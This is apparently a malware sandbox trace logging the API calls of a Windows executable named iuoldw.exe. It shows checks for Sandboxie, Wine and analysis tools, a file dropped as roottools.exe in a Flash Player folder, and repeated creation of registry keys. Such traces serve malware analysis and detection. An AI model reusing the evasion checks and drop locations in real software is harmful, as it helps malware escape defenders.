Module Load module_name = SHLWAPI.dll, base_address = 0x750d0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shlwapi.dll, function = PathAddBackslashW, address_out = 0x750ec177 True 1
Fn
Module Load module_name = SHLWAPI.dll, base_address = 0x750d0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shlwapi.dll, function = wvnsprintfW, address_out = 0x7511066c True 1
Fn
Module Load module_name = SHLWAPI.dll, base_address = 0x750d0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shlwapi.dll, function = PathUnquoteSpacesW, address_out = 0x750e5331 True 1
Fn
Module Load module_name = SHLWAPI.dll, base_address = 0x750d0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shlwapi.dll, function = PathSkipRootW, address_out = 0x750ffbf5 True 1
Fn
Module Load module_name = SHLWAPI.dll, base_address = 0x750d0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shlwapi.dll, function = PathFindExtensionW, address_out = 0x750ea1b9 True 1
Fn
Module Load module_name = SHLWAPI.dll, base_address = 0x750d0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shlwapi.dll, function = SHDeleteValueW, address_out = 0x750dfcca True 1
Fn
Module Load module_name = SHLWAPI.dll, base_address = 0x750d0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shlwapi.dll, function = wvnsprintfA, address_out = 0x750fedfe True 1
Fn
Module Load module_name = SHLWAPI.dll, base_address = 0x750d0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shlwapi.dll, function = PathIsDirectoryW, address_out = 0x750dff07 True 1
Fn
Module Load module_name = SHLWAPI.dll, base_address = 0x750d0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shlwapi.dll, function = PathRemoveBackslashW, address_out = 0x750e5c62 True 1
Fn
Module Load module_name = SHLWAPI.dll, base_address = 0x750d0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shlwapi.dll, function = UrlUnescapeA, address_out = 0x750fc6fb True 1
Fn
Module Load module_name = SHLWAPI.dll, base_address = 0x750d0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shlwapi.dll, function = PathQuoteSpacesW, address_out = 0x7510ce21 True 1
Fn
Module Load module_name = PSAPI.DLL, base_address = 0x74eb0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\psapi.dll, function = GetModuleFileNameExW, address_out = 0x74eb13f0 True 1
Fn
Module Load module_name = ole32.dll, base_address = 0x75450000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\ole32.dll, function = CLSIDFromString, address_out = 0x7546e599 True 1
Fn
Module Load module_name = ole32.dll, base_address = 0x75450000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\ole32.dll, function = CoInitializeEx, address_out = 0x754909ad True 1
Fn
Module Load module_name = ole32.dll, base_address = 0x75450000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\ole32.dll, function = CreateStreamOnHGlobal, address_out = 0x7547363b True 1
Fn
Module Load module_name = ole32.dll, base_address = 0x75450000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\ole32.dll, function = CoSetProxyBlanket, address_out = 0x75465ea5 True 1
Fn
Module Load module_name = ole32.dll, base_address = 0x75450000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\ole32.dll, function = CoCreateInstance, address_out = 0x75499d0b True 1
Fn
Module Load module_name = ole32.dll, base_address = 0x75450000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\ole32.dll, function = CoUninitialize, address_out = 0x754986d3 True 1
Fn
Module Load module_name = GDI32.dll, base_address = 0x75130000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\gdi32.dll, function = DeleteObject, address_out = 0x75145689 True 1
Fn
Module Load module_name = GDI32.dll, base_address = 0x75130000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\gdi32.dll, function = GetDeviceCaps, address_out = 0x75144de0 True 1
Fn
Module Load module_name = GDI32.dll, base_address = 0x75130000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\gdi32.dll, function = CreateDCW, address_out = 0x7514e743 True 1
Fn
Module Load module_name = GDI32.dll, base_address = 0x75130000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\gdi32.dll, function = CreateCompatibleDC, address_out = 0x751454f4 True 1
Fn
Module Load module_name = GDI32.dll, base_address = 0x75130000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\gdi32.dll, function = SelectObject, address_out = 0x75144f70 True 1
Fn
Module Load module_name = GDI32.dll, base_address = 0x75130000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\gdi32.dll, function = CreateCompatibleBitmap, address_out = 0x75145f49 True 1
Fn
Module Load module_name = GDI32.dll, base_address = 0x75130000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\gdi32.dll, function = BitBlt, address_out = 0x75145ea6 True 1
Fn
Module Load module_name = GDI32.dll, base_address = 0x75130000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\gdi32.dll, function = DeleteDC, address_out = 0x751458b3 True 1
Fn
Module Load module_name = WININET.dll, base_address = 0x75350000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\wininet.dll, function = InternetConnectA, address_out = 0x753749e9 True 1
Fn
Module Load module_name = WININET.dll, base_address = 0x75350000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\wininet.dll, function = InternetReadFile, address_out = 0x7536b406 True 1
Fn
Module Load module_name = WININET.dll, base_address = 0x75350000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\wininet.dll, function = HttpQueryInfoA, address_out = 0x7536a33e True 1
Fn
Module Load module_name = WININET.dll, base_address = 0x75350000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\wininet.dll, function = InternetQueryOptionA, address_out = 0x75361b56 True 1
Fn
Module Load module_name = WININET.dll, base_address = 0x75350000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\wininet.dll, function = HttpOpenRequestA, address_out = 0x75374c7d True 1
Fn
Module Load module_name = WININET.dll, base_address = 0x75350000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\wininet.dll, function = InternetCrackUrlA, address_out = 0x7535d075 True 1
Fn
Module Load module_name = WININET.dll, base_address = 0x75350000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\wininet.dll, function = InternetSetOptionA, address_out = 0x753675e8 True 1
Fn
Module Load module_name = WININET.dll, base_address = 0x75350000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\wininet.dll, function = InternetOpenA, address_out = 0x7537f18e True 1
Fn
Module Load module_name = WININET.dll, base_address = 0x75350000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\wininet.dll, function = InternetCloseHandle, address_out = 0x7536ab49 True 1
Fn
Module Load module_name = WININET.dll, base_address = 0x75350000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\wininet.dll, function = HttpSendRequestA, address_out = 0x753e18f8 True 1
Fn
Module Load module_name = urlmon.dll, base_address = 0x76c40000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\urlmon.dll, function = ObtainUserAgentString, address_out = 0x76c71d76 True 1
Fn
Module Load module_name = OLEAUT32.dll, base_address = 0x76b60000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = 9, address_out = 0x76b63eae True 1
Fn
Module Load module_name = Secur32.dll, base_address = 0x748e0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\secur32.dll, function = GetUserNameExW, address_out = 0x74dea415 True 1
Fn
Module Get Handle module_name = c:\users\aetadzjz\appdata\roaming\iuoldw.exe, base_address = 0x400000 True 1
Fn
System Get Computer Name result_out = YKYD69Q True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion, value_name = InstallDate, data = 0, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion, value_name = DigitalProductId False 1
Fn
System Get Info type = Operating System True 3
Fn
Module Get Filename process_name = c:\users\aetadzjz\appdata\roaming\iuoldw.exe, file_name_orig = C:\Users\aETAdzjz\AppData\Roaming\iuoldw.exe, size = 260 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\ntdll.dll, base_address = 0x77270000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\ntdll.dll, function = RtlDosPathNameToNtPathName_U, address_out = 0x772cce41 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\ntdll.dll, function = NtCreateFile, address_out = 0x772900a4 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\ntdll.dll, function = NtClose, address_out = 0x7728f9d0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\ntdll.dll, function = NtQueryEaFile, address_out = 0x77291314 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\ntdll.dll, function = NtSetEaFile, address_out = 0x772919b0 True 1
Fn
File Create filename = \??\C:\Users\aETAdzjz\AppData\Roaming\iuoldw.exe, desired_access = FILE_READ_EA, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
File Get Info filename = \??\C:\Users\aETAdzjz\AppData\Roaming\iuoldw.exe, type = extended False 1
Fn
Mutex Create mutex_name = 9B4D68961731FE3C22DA08B640799EB6 True 1
Fn
Mutex Open mutex_name = E58EFF540968A436E982FCFA1C0445A2, desired_access = SYNCHRONIZE False 2
Fn
Module Get Filename process_name = c:\users\aetadzjz\appdata\roaming\iuoldw.exe, file_name_orig = C:\Users\aETAdzjz\AppData\Roaming\iuoldw.exe, size = 260 True 1
Fn
Keyboard Get Info type = KB_LOCALE_ID True 2
Fn
File Create filename = C:\popupkiller.exe, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE False 1
Fn
File Create filename = C:\stimulator.exe, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE False 1
Fn
File Create filename = C:\TOOLS\execute.exe, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE False 1
Fn
Module Load module_name = SbieDll.dll, base_address = 0x0 False 1
Fn
Mutex Create mutex_name = Sandboxie_SingleInstanceMutex_Control True 1
Fn
Mutex Create mutex_name = Frz_State True 1
Fn
File Create filename = \\.\NPF_NdisWanIp, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE False 1
Fn
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x759f0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = wine_get_unix_file_name, address_out = 0x0 False 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WINE False 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\Software\WINE False 1
Fn
System Sleep duration = 0 milliseconds (0.000 seconds) True 28
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\SJpF7mOw3gFdA.hin, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
System Sleep duration = 0 milliseconds (0.000 seconds) True 28
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\rO4p00rRfog3ie0eV3.ecv, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
System Sleep duration = 0 milliseconds (0.000 seconds) True 28
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\Microsoft OneDrive.rig, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
System Sleep duration = 0 milliseconds (0.000 seconds) True 28
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\roottools.exe, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Registry Create Key reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft True 1
Fn
Registry Get Key Info reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft True 1
Fn
Registry Enumerate Keys reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft True 1
Fn
Registry Create Key reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows True 1
Fn
Registry Get Key Info reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft True 1
Fn
Registry Enumerate Keys reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft True 1
Fn
Registry Create Key reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office True 1
Fn
Registry Get Key Info reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft True 1
Fn
Registry Enumerate Keys reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft False 1
Fn
Registry Get Key Info reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft True 1
Fn
Registry Enumerate Keys reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft False 1
Fn
Registry Get Key Info reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft True 1
Fn
Registry Enumerate Keys reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft True 1
Fn
Registry Create Key reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\GDIPlus True 1
Fn
Registry Get Key Info reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft True 1
Fn
Registry Enumerate Keys reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft False 1
Fn
Registry Get Key Info reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft True 1
Fn
Registry Enumerate Keys reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft False 1
Fn
Registry Get Key Info reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft True 1
Fn
Registry Enumerate Keys reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft True 1
Fn
Registry Create Key reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\GDIPlus True 1
Fn
Registry Get Key Info reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft True 1
Fn
Registry Enumerate Keys reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft False 1
Fn
Registry Get Key Info reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft True 1
Fn
Registry Enumerate Keys reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft True 1
Fn
Registry Create Key reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\MSDAIPP True 1
Fn
Registry Get Key Info reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft True 1
Fn
Registry Enumerate Keys reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft True 1
Fn
Registry Create Key reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\IAM True 1
Fn
Registry Get Key Info reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft True 1
Fn
Registry Enumerate Keys reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft False 1
Fn
Registry Get Key Info reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft True 1
Fn
Registry Enumerate Keys reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft False 1
Fn
Registry Get Key Info reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft True 1
Fn
Registry Enumerate Keys reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft True 1
Fn
Registry Create Key reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\OneDrive True 1
Fn
Registry Get Key Info reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft True 1
Fn
Registry Enumerate Keys reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft True 1
Fn
Registry Create Key reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Direct3D True 1
Fn
Registry Get Key Info reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft True 1
Fn
Registry Enumerate Keys reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft False 1
Fn
Registry Get Key Info reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft True 1
Fn
Registry Enumerate Keys reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft True 1
Fn
Registry Create Key reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Shared True 1
Fn
Registry Get Key Info reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft True 1
Fn
Registry Enumerate Keys reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft True 1
Fn
Registry Create Key reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\IMEJP True 1
Fn
Registry Get Key Info reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft True 1
Fn
Registry Enumerate Keys reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft False 1
Fn
Registry Get Key Info reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft True 1
Fn
Registry Enumerate Keys reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft True 1
Fn
Registry Create Key reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows True 1
Fn
Registry Get Key Info reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft True 1
Fn
Registry Enumerate Keys reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft True 1
Fn
Registry Create Key reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\MSDAIPP True 1
Fn
Registry Get Key Info reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft True 1
Fn
Registry Enumerate Keys reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft False 1
Fn
Registry Get Key Info reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft True 1
Fn
Registry Enumerate Keys reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft True 1
Fn
Registry Create Key reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Shared True 1
Fn
Registry Get Key Info reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft True 1
Fn
Registry Enumerate Keys reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft False 1
Fn
Registry Get Key Info reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft True 1
Fn
Registry Enumerate Keys reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft True 1
Fn
Registry Create Key reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\IAM True 1
Fn
Registry Get Key Info reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft True 1
Fn
Registry Enumerate Keys reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft True 1
Fn
Registry Create Key reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Speech True 1
Fn
Registry Get Key Info reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft True 1
Fn
Registry Enumerate Keys reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft False 1
Fn
Registry Get Key Info reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft True 1
Fn
Registry Enumerate Keys reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft True 1
Fn
Registry Create Key reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\OneDrive True 1
Fn
Registry Get Key Info reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft True 1
Fn
Registry Enumerate Keys reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft True 1
Fn
Registry Create Key reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Exchange True 1
Fn
Registry Get Key Info reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft True 1
Fn
Registry Enumerate Keys reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft True 1
Fn
Registry Create Key reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Direct3D True 1
Fn
Registry Get Key Info reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft True 1
Fn
Registry Enumerate Keys reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft False 1
Fn
Registry Get Key Info reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft True 1
Fn
Registry Enumerate Keys reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft True 1
Fn
Registry Create Key reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\GDIPlus True 1
Fn
Registry Get Key Info reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft True 1
Fn
Registry Enumerate Keys reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft False 1
Fn
Registry Get Key Info reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft True 1
Fn
Registry Enumerate Keys reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft False 1
Fn
Registry Get Key Info reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft True 1
Fn
Registry Enumerate Keys reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft True 1
Fn
Registry Create Key reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\GDIPlus True 1
Fn
Registry Get Key Info reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft True 1
Fn
Registry Enumerate Keys reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft False 1
Fn
Registry Get Key Info reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft True 1
Fn
Registry Enumerate Keys reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft True 1
Fn
Registry Create Key reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Exchange True 1
Fn
Registry Get Key Info reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft True 1
Fn
Registry Enumerate Keys reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft False 1
Fn
Registry Get Key Info reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft True 1
Fn
Registry Enumerate Keys reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft False 1
Fn
Registry Get Key Info reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft True 1
Fn
Registry Enumerate Keys reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft True 1
Fn
Registry Create Key reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Wisp True 1
Fn
Registry Get Key Info reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft True 1
Fn
Registry Enumerate Keys reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft False 1
Fn
Registry Get Key Info reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft True 1
Fn
Registry Enumerate Keys reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft False 1
Fn
Registry Get Key Info reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft True 1
Fn
Registry Enumerate Keys reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft False 1
Fn
Registry Get Key Info reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft True 1
Fn
Registry Enumerate Keys reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft False 1
Fn
Registry Get Key Info reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft True 1
Fn
Registry Enumerate Keys reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft True 1
Fn
Registry Create Key reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Speech True 1
Fn
Registry Get Key Info reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft True 1
Fn
Registry Enumerate Keys reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft True 1
Fn
Registry Create Key reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Wisp True 1
Fn
Registry Get Key Info reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft True 1
Fn
Registry Enumerate Keys reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft True 1
Fn
Registry Create Key reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Notepad True 1
Fn
Registry Get Key Info reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft True 1
Fn
Registry Enumerate Keys reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft True 1
Fn
Registry Create Key reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\SQMClient True 1
Fn
Registry Get Key Info reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft True 1
Fn
Registry Enumerate Keys reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft False 1
Fn
Registry Get Key Info reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft True 1
Fn
Registry Enumerate Keys reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft False 1
Fn
Registry Get Key Info reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft True 1
Fn
Registry Enumerate Keys reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft True 1
Fn
Registry Create Key reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\IAM True 1
Fn
Registry Get Key Info reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft True 1
Fn
Registry Enumerate Keys reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft True 1
Fn
Registry Create Key reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Speech True 1
Fn
Registry Get Key Info reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft True 1
Fn
Registry Enumerate Keys reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft False 1
Fn
Registry Get Key Info reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft True 1
Fn
Registry Enumerate Keys reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft False 1
Fn
Registry Get Key Info reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft True 1
Fn
Registry Enumerate Keys reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft False 1
Fn
Registry Get Key Info reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft True 1
Fn
Registry Enumerate Keys reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft False 1
Fn
Registry Get Key Info reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft True 1
Fn
Registry Enumerate Keys reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft True 1
Fn
Registry Create Key reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Keyboard True 1
Fn
Registry Get Key Info reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft True 1
Fn
Registry Enumerate Keys reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft False 1
Fn
Registry Get Key Info reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft True 1
Fn
Registry Enumerate Keys reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft False 1
Fn
Registry Get Key Info reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft True 1
Fn
Registry Enumerate Keys reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft True 1
Fn
Registry Create Key reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\wfs True 1
Fn
Registry Get Key Info reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft True 1
Fn
Registry Enumerate Keys reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft False 1
Fn
Registry Get Key Info reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft True 1
Fn
Registry Enumerate Keys reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft False 1
Fn
Registry Get Key Info reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft True 1
Fn
Registry Enumerate Keys reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft False 1
Fn
Registry Get Key Info reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft True 1
Fn
Registry Enumerate Keys reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft False 1
Fn
Registry Get Key Info reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft True 1
Fn
Registry Enumerate Keys reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft False 1
Fn
Registry Get Key Info reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft True 1
Fn
Registry Enumerate Keys reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft False 1
Fn
Registry Get Key Info reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft True 1
Fn
Registry Enumerate Keys reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft False 1
Fn
Registry Get Key Info reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft True 1
Fn
Registry Enumerate Keys reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft True 1
Fn
Registry Create Key reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\SkyDrive True 1
Fn
Registry Get Key Info reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft True 1
Fn
Registry Enumerate Keys reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft True 1
Fn
Registry Create Key reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\MSDAIPP True 1
Fn
Registry Get Key Info reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft True 1
Fn
Registry Enumerate Keys reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft False 1
Fn
Registry Get Key Info reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft True 1
Fn
Registry Enumerate Keys reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft False 1
Fn
